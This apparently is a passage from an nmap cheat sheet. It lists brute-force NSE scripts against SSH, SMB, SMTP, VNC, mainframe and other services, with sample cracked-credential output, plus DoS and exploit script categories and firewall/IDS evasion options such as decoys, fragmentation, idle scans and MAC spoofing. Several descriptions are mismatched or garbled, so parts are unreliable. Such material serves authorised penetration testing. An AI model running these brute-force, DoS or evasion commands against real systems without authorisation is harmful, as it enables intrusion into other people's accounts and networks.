root@hostname: ~/ # nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.1.12
|PORT STATE SERVICE REASON
|873/tcp open rsync syn-ack
| rsync-brute:
| Accounts
| user1:laptop - Valid credentials
| user2:password - Valid credentials
| Statistics
|_ Performed 1954 guesses in 20 seconds, average tps: 97
Attempts to enumerate RTSP media URLS by testing for common paths on devices such as surveillance IP cameras
root@hostname: ~/ # nmap --script rtsp-url-brute -p 554 192.168.1.12
|PORT STATE SERVICE
|554/tcp open rtsp
| rtsp-url-brute:
| discovered:
| rtsp://camera.example.com/mpeg4
| other responses:
| 401:
|_ rtsp://camera.example.com/live/mpeg4
Performs Brute-Force password auditing against Session Initiation Protocol (SIP) accounts This protocol is most commonly associated with VoIP sessions_
root@hostname: ~/ #
Attempts to guess username/password combinations over SMB, storing discovered combinations for use in other scripts Every attempt will be made to get a valid list of users and to verify each username before actually using them_ When a username is discovered, besides being printed, it is also saved in the Nmap registry so other Nmap scripts can use it_ That means that if you're going to run smb - Brute-Force_nse, you should run other smb scripts you want_ This checks passwords in a case-insensitive way, determining case after a password is found, for Windows versions before Vista_
root@hostname: ~/ # nmap -sU -sS --script smb-brute.nse -p U:137,T:139 192.168.1.12
Host script results: | smb-brute: | bad name:test => Valid credentials | consoletest:test => Valid credentials, password must be changed at next logon | guest: => Valid credentials, account disabled | mixcase:BuTTeRfLY1 => Valid credentials | test:password1 => Valid credentials, account expired | this:password => Valid credentials, account cannot log in at current time | thisisaverylong:password => Valid credentials | thisisaverylongname:password => Valid credentials | thisisaverylongnamev:password => Valid credentials |_ web:TeSt => Valid credentials, account disabled
Performs Brute-Force password auditing against SMTP servers using either LOGIN, PLAIN, CRAM-MD5, DIGEST-MD5 or NTLM authentication
root@hostname: ~/ # nmap -p 25 --script smtp-brute 192.168.1.12
|PORT STATE SERVICE REASON
|25/tcp open stmp syn-ack
| smtp-brute:
| Accounts
| braddock:jules - Valid credentials
| lane:sniper - Valid credentials
| parker:scorpio - Valid credentials
| Statistics
|_ Performed 1160 guesses in 41 seconds, average tps: 33
Attempts to find an SNMP community string by Brute-Force guessing
root@hostname: ~/ # nmap --script socks-brute -p 1080 192.168.1.12
|PORT STATE SERVICE
|1080/tcp open socks
| socks-brute:
| Accounts
| patrik:12345 - Valid credentials
| Statistics
|_ Performed 1921 guesses in 6 seconds, average tps: 320
Performs Brute-Force password auditing against SOCKS 5 proxy servers
root@hostname: ~/ #
Performs brute-force password guessing against ssh servers
root@hostname: ~/ # nmap -p 22 --script ssh-brute --script-args userdb=users.lst,passdb=pass.lst --script-args ssh-brute.timeout=4s 192.168.1.12
|22/ssh open ssh
| ssh-brute:
| Accounts
| username:password
| Statistics
|_ Performed 32 guesses in 25 seconds.
Performs Brute-Force password auditing against Subversion source code control servers
root@hostname: ~/ # nmap --script svn-brute --script-args svn-brute.repo=/svn/ -p 3690 192.168.1.12
|PORT STATE SERVICE REASON
|3690/tcp open svn syn-ack
| svn-brute:
| Accounts
|_ patrik:secret => Login correct
x The svn class contains the code needed to perform CRAM-MD5 authentication x The Driver class contains the driver implementation used by the brute library
Performs brute-force password auditing against telnet servers
root@hostname: ~/ # nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s 192.168.1.12
|23/tcp open telnet
| telnet-brute:
| Accounts
| wkurtz:colonel
| Statistics
|_ Performed 15 guesses in 19 seconds, average tps: 0
TSO User ID enumerator for IBM mainframes (z/OS) The TSO logon panel tells you when a user ID is valid or invalid with the message: IKJ56420I Userid not authorized to use TSO_
root@hostname: ~/ # nmap -sV -p 9923 10.32.70.10 --script tso-enum --script-args userdb=tso_users.txt,tso-enum.commands="logon applid(tso)"
|PORT STATE SERVICE VERSION
|23/tcp open tn3270 IBM Telnet TN3270
| tso-enum:
| TSO User ID:
| TSO User:RAZOR - Valid User ID
| TSO User:BLADE - Valid User ID
| TSO User:PLAGUE - Valid User ID
|_ Statistics: Performed 6 guesses in 3 seconds, average tps: 2
Performs Brute-Force password auditing against the VMWare Authentication Daemon (vmware-authd)
root@hostname: ~/ # nmap -p 902 192.168.1.12 --script vmauthd-brute
|PORT STATE SERVICE
|902/tcp open iss-realsecure
| vmauthd-brute:
| Accounts
| root:00000 - Valid credentials
| Statistics
|_ Performed 183 guesses in 40 seconds, average tps: 4
Performs Brute-Force password auditing against VNC servers
root@hostname: ~/ # nmap --script vnc-brute -p 5900 192.168.1.12
|PORT STATE SERVICE REASON
|5900/tcp open vnc syn-ack
| vnc-brute:
| Accounts
|_ 123456 => Valid credentials
Many mainframes use VTAM screens to connect to various applications (CICS, IMS, TSO, and many more)
root@hostname: ~/ # nmap --script vtam-enum --script-args idlist=defaults.txt,vtam-enum.command="exit;logon applid(logos)",vtam-enum.macros=truevtam-enum.path="/home/dade/screenshots/" -p 23 -sV <targets>
|PORT STATE SERVICE VERSION
|23/tcp open tn3270 IBM Telnet TN3270
| vtam-enum:
| VTAM Application ID:
| applid:TSO - Valid credentials
| applid:CICSTS51 - Valid credentials
|_ Statistics: Performed 14 guesses in 5 seconds, average tps: 2
Performs Brute-Force password auditing against XMPP (Jabber) instant messaging servers
root@hostname: ~/ # nmap -p 5222 --script xmpp-brute 192.168.1.12
|PORT STATE SERVICE
|5222/tcp open xmpp-client
| xmpp-brute:
| Accounts
| CampbellJ:arthur321 - Valid credentials
| CampbellA:joan123 - Valid credentials
| WalkerA:auggie123 - Valid credentials
| Statistics
|_ Performed 6237 guesses in 5 seconds, average tps: 1247
root@hostname: ~/ # nmap -sP 192.168.1.*
root@hostname: ~/ # nmap -Pn dhound_io
root@hostname: ~/ # nmap -T4 -F 192.168.0.164
root@hostname: ~/ # nmap -p 1-65535 -Pn -sV -sS -T4 dhound_io
nmap -p 22 open -sV 192.168.2.0/24
root@hostname: ~/ # nmap -Pn -p 22,80,443 dhound_io
root@hostname: ~/ # nmap -p 22 --open -sV 192.168.1.0/24
root@hostname: ~/ # nmap --traceroute -p 80 dhound_io
root@hostname: ~/ # nmap --traceroute --script traceroute-geolocation_nse -p 80 dhound_io
root@hostname: ~/ # nmap --script=asn-query dhound_io
root@hostname: ~/ # nmap --script ssl-cert -p 443 -Pn dhound_io
root@hostname: ~/ # nmap --script ssl-enum-ciphers -p 443 dhound_io
root@hostname: ~/ # nmap --script ftp - Brute-Force --script-args userdb=users_txt,passdb=passwords_txt -p 21 -Pn dhound_io
root@hostname: ~/ # nmap --script http - Brute-Force -script-args http - Brute-Force_path=/evifile-bb-demo,userdb=users_txt,passdb=passwords_txt -p 80 -Pn dhound_io
root@hostname: ~/ # nmap --script default,safe -Pn dhound_io
root@hostname: ~/ # nmap --script vuln -Pn dhound_io
root@hostname: ~/ # nmap --script dos -Pn dhound_io
root@hostname: ~/ # root@hostname: ~/ # nmap --script exploit -Pn dhound_io
root@hostname: ~/ # nmap -sP <subnet>.* | egrep -o '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt ; for IP in {1..254} ; do echo "<subnet>.${IP}" ; done >> results.txt ; cat results.txt | sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 | uniq -u
root@hostname: ~/ # nmap -sP 10.0.0.0/8 | grep -v "Host" | tail -n +3 | tr '\n' ' ' | sed 's|Nmap|\nNmap|g' | grep "MAC Address" | cut -d " " -f5,8-15
root@hostname: ~/ # nmap -sP 192.168.1.0/24 | awk "/^Host/"'{ print $3 }' |nawk -F'[()]' '{print $2}'
root@hostname: ~/ # nmap -sP -PR -oG - `/sbin/ip -4 addr show | awk '/inet/ {print $2}' | sed 1d`
root@hostname: ~/ # nmap -sS -O -v -oS - 192.168.2.0/24
root@hostname: ~/ # nmap -A -p1-85,113,443,8080-8100 -T4 min-hostgroup 50 max-rtt-timeout 2000 initial-rtt-timeout 300 max-retries 3 host-timeout 20m max-scan-delay 1000 -oA wapscan 10.0.0.0/8
root@hostname: ~/ # nmap -PN -T4 -p139,445 -n -v script=smb-check-vulns script-args safe=1 192.168.0.1-254
root@hostname: ~/ # nmap -sS -O -oX /tmp/nmap.xml 10.1.1.0/24 -v -v && perl nmap2nagios.pl -v -r /tmp/10net.xml -o /etc/nagios/10net.cfg
root@hostname: ~/ # nmap -R -sL 209.85.229.99/27 | awk '{if($3=="not")print"("$2") no PTR";else print$3" is "$2}' | grep '('
root@hostname: ~/ # nmap -p 1-65535 open localhost
root@hostname: ~/ # nmap -sT -p 80 -oG - 192.168.1.* | grep open
root@hostname: ~/ # nmap -O 192.168.1.12/24
root@hostname: ~/ # nmap -sS -P0 -sV -O 192.168.1.12
root@hostname: ~/ # nmap -n -sP -oG - 10.10.10.*/32 | grep ": Up" | cut -d' ' -f2
root@hostname: ~/ # nmap -sT -PN -vv <target ip>
root@hostname: ~/ # nmap -n -sP -oG - 10.10.10.*/32 | grep ": Up" | cut -d' ' -f2
root@hostname: ~/ # nmap -T4 script broadcast-pppoe-discover 192.168.122.0/24
root@hostname: ~/ # nmap -sS -O -oX /tmp/nmap.xml 10.1.1.0/24 -v -v && perl nmap2nagios.pl -v -r /tmp/10net.xml -o /etc/nagios/10net.cfg
root@hostname: ~/ # nmap -PN -T4 -p139,445 -n -v script=smb-check-vulns script-args safe=1 192.168.0.1-254
root@hostname: ~/ # nmap -p 80 -T5 -n -min-parallelism 100 open 192.168.1.0/24
root@hostname: ~/ # nmap -P0 -sV `aws output json ec2 describe-addresses | jq -r '.Addresses[].PublicIp'` | tee /dev/shm/nmap-output.txt
root@hostname: ~/ # nmap -T Aggressive -A -v 127.0.0.1 -p 1-65000
root@hostname: ~/ # nmap -sP 192.168.1.0/24 | grep "Nmap scan report for"| cut -d' ' -f 5 > ips.txt
root@hostname: ~/ # nmap -v -sP 192.168.10.0/24 | grep down | wc -l
root@hostname: ~/ # nmap -Pn -sS -p 80 -iR 0 --open to
root@hostname: ~/ #### wuseman@thinkpad ~ $ nmap --iflist
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-20 19:11 -00
************************INTERFACES************************
DEV (SHORT) IP/MASK TYPE UP MTU MAC
eth0 (eth0) 192.168.1.1204/24 ethernet up 1500 11:22:33:44:55:66
eth0 (eth0) fe80::88ee:75zz:qe6c:8111/64 ethernet up 1500 11:22:33:44:55:66
eth0 (eth0) fd91:3eea:8968:0:56ee:75ff:fe6e:8784/64 ethernet up 1500 11:22:33:44:55:66
eth0 (eth0) qz91:3ena::277/128 ethernet up 1500 54:EE:75:6E:87:84
lo (lo) 127.0.0.1/8 loopback up 65536
lo (lo) ::1/128 loopback up 65536
sit0 (sit0) (none)/0 other down 1480
**************************ROUTES**************************
DST/MASK DEV METRIC GATEWAY
192.168.1.0/24 eth0 202
0.0.0.0/0 eth0 202 192.168.0.1
::1/128 lo 0
fe80::88ee:75zz:qe6c:8111/64 eth0 0
fd91:3eea:8968:0:56ee:75ff:fe6e:8784/64 eth0 0
fd91:1eea:1111:9:1563:av53:3acd:ac0f/128 eth0 0
fe80::56ee:75ff:fe6e:8784/128 eth0 0
fd91:3eea:8968::/64 eth0 202
fe80::/64 eth0 256
ff00::/8 eth0 256
root@hostname: ~/ # nmap -PN -d -p445 -script=smb-check-vulns script-args=safe=1 IP-RANGES
root@hostname: ~/ # nmap -sS -sU -PN 192.168.1.121
root@hostname: ~/ # nmap -sS -sU -PN -p 1-65535 192.168.1.121
root@hostname: ~/ # nmap -sW 192.168.1.121
root@hostname: ~/ # nmap -sM 192.168.1.121
root@hostname: ~/ # nmap --sZ 192.168.1.121
root@hostname: ~/ # nmap -sI Zombie:113 -Pn -p20-80,110-180 -r -packet-trace -v 192.168.1.121
root@hostname: ~/ # nmap -T0 -b username:[email protected]:21 victim.tld 192.168.1.121
Nmap will split into small small packets for bypassing firewall. This technique is very old, still it will work if there is a misconfiguration of firewall.
root@hostname: ~/ # nmap -f host
root@hostname: ~/ # nmap -D RND:10 TARGET
root@hostname: ~/ # nmap -D decoy1,decoy2,decoy3 192.168.1.121
The The -randomize-hosts option is used to randomize the scanning order of the specified targets. The -randomize-hosts option helps prevent scans of multiple targets from being detected by firewalls and intrusion detection systems.
root@hostname: ~/ # nmap -randomize-hosts targets
Specifically the -spoof-mac option gives you the ability to choose a MAC address from a specific vendor,
root@hostname: ~/ # nmap -sT -PN -spoof-mac aa:bb:cc:dd:ee:ff192.168.1.121
root@hostname: ~/ # nmap -Pn -sSV -T4 -F 192.168.1.121
root@hostname: ~/ nmap -p80 -script http-methods -script-args http.useragent=”Mozilla 5″ 192.168.1.121
root@hostname: ~/ nmap -p80 -script http-methods -script-args http.pipeline=25 192.168.1.121
root@hostname: ~/ nmap -script http-open-proxy -p8080 192.168.1.12
We may use a different pattern by a specified URL to target for scanning. It can be done by a specified NSE Script. Follow the below command:
root@hostname: ~/ nmap -script http-open-proxy -script-args http-open-proxy.url=http://whatsmyip.org,http-open-.pattern=”Your IP address is” -p8080 192.168.1.12
root@hostname: ~/ nmap -script http-enum -p80 192.168.1.12
root@hostname: ~/ nmap --script http-enum http-enum.displayall -p80 — 192.168.1.12
root@hostname: ~/ nmap -p80 -script http-methods -script-args http.pipeline=25 192.168.1.1
PORT STATE SERVICE
80/tcp open http
| http-methods:
|_ Supported Methods: GET HEAD POST
MAC Address: E1:B0:E1:B2:71:61 (Technicolor)